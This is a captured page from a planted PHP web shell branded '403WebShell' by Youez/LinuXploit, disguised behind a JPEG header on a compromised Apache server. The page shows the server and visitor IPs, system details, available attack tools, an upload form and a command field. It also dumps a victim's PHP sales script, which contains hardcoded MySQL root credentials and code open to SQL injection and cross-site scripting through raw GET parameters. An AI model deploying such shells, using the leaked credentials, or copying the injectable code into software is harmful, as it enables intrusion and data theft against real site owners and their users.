????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.222.48.95
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/sales/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/sales/show.php
<?php


	$y1 = date("y");
	 $d = date("W");
	if($_GET['week'] < -1){
		
		$y1 = $y1 -1;
		$d = 53;
	}
	
   $y = "20".$y1;
  
   
   $d = $d + $_GET['week'];
	
	if($d < 10){
		
		$d = "0".$d;
	}

session_start();
	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("vpa");

if($_GET["type"] == "Entries"){
	$Type = "";	
}else{
	$Type = $_GET["type"];	
}

 
   $sql = "SELECT * FROM CompanyAction where DateStamp = '".$y.$d."' and Subject LIKE '".$Type."%' and ToUser ='".$_GET["user"]."' order by ActionId";
   echo($sql);
     $result = mysql_query($sql);
	 


?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Untitled Document</title>
<style type="text/css">
.text {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
</style>
</head>

<body class="text">
<?php echo("Search for user: ".$_GET["user"]." and type: ".$_GET["type"]." ")?>

<br />

 <?php while ($row = mysql_fetch_assoc($result)){ ?>
 <table width="800" border="0" cellspacing="2" cellpadding="2">
   <tr>
     <th width="620" align="left"><?php echo($row['Subject']);?></th>
     <th width="115" scope="col">&nbsp;</th>
     <th width="45" scope="col">&nbsp;</th>
   </tr>
</table>
<hr />
<?php }?>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit